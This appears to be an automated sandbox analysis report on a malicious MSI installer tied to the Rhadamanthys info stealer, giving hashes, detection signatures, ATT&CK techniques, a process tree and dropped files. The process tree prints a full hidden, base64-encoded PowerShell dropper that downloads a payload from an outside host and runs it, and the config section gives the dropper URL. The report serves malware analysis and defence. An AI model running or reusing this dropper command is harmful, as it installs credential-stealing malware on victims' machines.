Analysis

  • max time kernel
    134s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 04:18

General

  • Target

    __x64___setup___x32__/setup.msi

  • Size

    34.8MB

  • MD5

    1086315ee22b1c20eb4aa7a57cbb8b6b

  • SHA1

    1c734fc3f48e355a438cfed270f927b3922ef0ac

  • SHA256

    d9324c156a90b828e3f110a871b6eca08bb6251fc34dcb8b570c05f48a6b642d

  • SHA512

    f6fdfd4751e9b717b7acef31973e34219d2c1e49869b956c27f2a675461ad70b4d727fefb8dba5910954ef8012232913e79549acaa75558015e4de24ee804c05

  • SSDEEP

    786432:wqqRkI57hVSZmlNdonqUuhGMCiEIS/vTis1Mscz:wq+T57jSZmGnqUezSTtqz

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://two-root.com/2506s.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2248
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3120
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
      1⤵
      • Enumerates connected drives
      • Event Triggered Execution: Installer Packages
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:936
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 135D5B7E7274BC3B1C6CA199EFB50182
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:1128
      • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\"
        2⤵
        • Executes dropped EXE
        PID:3312
      • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe
        "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1660
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAyADUAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2408
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1820
            4⤵
            • Program crash
            PID:1536
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1748
            4⤵
            • Program crash
            PID:552
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 696
            4⤵
            • Program crash
            PID:2864
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 464 -ip 464
      1⤵
        PID:1604
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 464 -ip 464
        1⤵
          PID:1288
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 464 -ip 464
          1⤵
            PID:4868

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Privilege Escalation

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e575557.rbs
            Filesize

            25KB

            MD5

            a738de8af493f0c17f98daa7134803f7

            SHA1

            ac9488f43fbc245910cd53070ee5e0f952ff4fee

            SHA256

            4cc9274e386ba2b2dfc8bd9f86209f778b4944a5e883f774789366d3092c1b29

            SHA512

            994d980a72d747665b22a8f0012ecd3a79eab04a092e3f5bdc48998ee062e71069d177ac3fa54ed98341245ae858a9f9fa9384b37969ba6bdf4ebeb85f07ac22

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gizzre31.h2h.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\nijboq.rar
            Filesize

            378KB

            MD5

            97bc4d7739d18cdd5276f9765790a06e

            SHA1

            c83bd0c26b22f8fe93564f1e3b215ebf1c858b21

            SHA256

            8e0ccd306430d7fee896305a965a06438bb6627ea92e92deef0d4ff02856b872

            SHA512

            45bb33d2a3014fa470b7a61026f3b2c79315579da4c36f9b69b2a5e0a9565c1304dff55af7ecfe3c34f250a379e8a5cc4b62103a820d710ed7a8337758a7e355

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnp.dll
            Filesize

            1003KB

            MD5

            8348f9b5827a749302e9d44dcc8e4e9e

            SHA1

            7493bd5ef1bafbe81d9f18e26ea9ed83bccea2e0

            SHA256

            5c16a3edddb5b1a8f602df239427b5bfe5b9a00ee21e40085a9da888f3d4d48d

            SHA512

            b4bdfe23fe5b9b344cfbdf376038452f74eff70d913b67e3f6593872ece72a5931303c515ef3112e10877cf37078a497a4dc30a828f3f7131f2418efcb3035c2

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe
            Filesize

            780KB

            MD5

            ae63517a3ce7949a2c084cd7541c2fd8

            SHA1

            8dafa610a0c3aa6ee2e50f657c90757bfae80336

            SHA256

            14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26

            SHA512

            fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

          • C:\Windows\Installer\MSI562E.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI5930.tmp
            Filesize

            1.1MB

            MD5

            1a2b237796742c26b11a008d0b175e29

            SHA1

            cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

            SHA256

            81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

            SHA512

            3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

          • C:\Windows\Installer\MSI6D19.tmp
            Filesize

            364KB

            MD5

            54d74546c6afe67b3d118c3c477c159a

            SHA1

            957f08beb7e27e657cd83d8ee50388b887935fae

            SHA256

            f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

            SHA512

            d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

          • C:\Windows\Installer\e575554.msi
            Filesize

            34.8MB

            MD5

            1086315ee22b1c20eb4aa7a57cbb8b6b

            SHA1

            1c734fc3f48e355a438cfed270f927b3922ef0ac

            SHA256

            d9324c156a90b828e3f110a871b6eca08bb6251fc34dcb8b570c05f48a6b642d

            SHA512

            f6fdfd4751e9b717b7acef31973e34219d2c1e49869b956c27f2a675461ad70b4d727fefb8dba5910954ef8012232913e79549acaa75558015e4de24ee804c05

          • memory/464-160-0x0000000000D70000-0x0000000000D98000-memory.dmp
            Filesize

            160KB

          • memory/464-185-0x0000000004AB0000-0x0000000004EB0000-memory.dmp
            Filesize

            4.0MB

          • memory/464-188-0x0000000076410000-0x0000000076625000-memory.dmp
            Filesize

            2.1MB

          • memory/464-161-0x0000000000D70000-0x0000000000D98000-memory.dmp
            Filesize

            160KB

          • memory/464-186-0x00007FFD5E7D0000-0x00007FFD5E9C5000-memory.dmp
            Filesize

            2.0MB

          • memory/464-159-0x0000000000D70000-0x0000000000D98000-memory.dmp
            Filesize

            160KB

          • memory/464-184-0x0000000004AB0000-0x0000000004EB0000-memory.dmp
            Filesize

            4.0MB

          • memory/1660-158-0x000002547FCB0000-0x000002547FCD5000-memory.dmp
            Filesize

            148KB

          • memory/1660-157-0x000002547FCA0000-0x000002547FCA1000-memory.dmp
            Filesize

            4KB

          • memory/2408-163-0x000001E46A360000-0x000001E46A382000-memory.dmp
            Filesize

            136KB

          • memory/2408-196-0x000001E46A4D0000-0x000001E46A4EC000-memory.dmp
            Filesize

            112KB

          • memory/2408-231-0x000001E46AA90000-0x000001E46AC52000-memory.dmp
            Filesize

            1.8MB

          • memory/2408-232-0x000001E46B190000-0x000001E46B6B8000-memory.dmp
            Filesize

            5.2MB

          • memory/3120-189-0x0000000000B50000-0x0000000000B59000-memory.dmp
            Filesize

            36KB

          • memory/3120-191-0x00000000028A0000-0x0000000002CA0000-memory.dmp
            Filesize

            4.0MB

          • memory/3120-192-0x00007FFD5E7D0000-0x00007FFD5E9C5000-memory.dmp
            Filesize

            2.0MB

          • memory/3120-194-0x0000000076410000-0x0000000076625000-memory.dmp
            Filesize

            2.1MB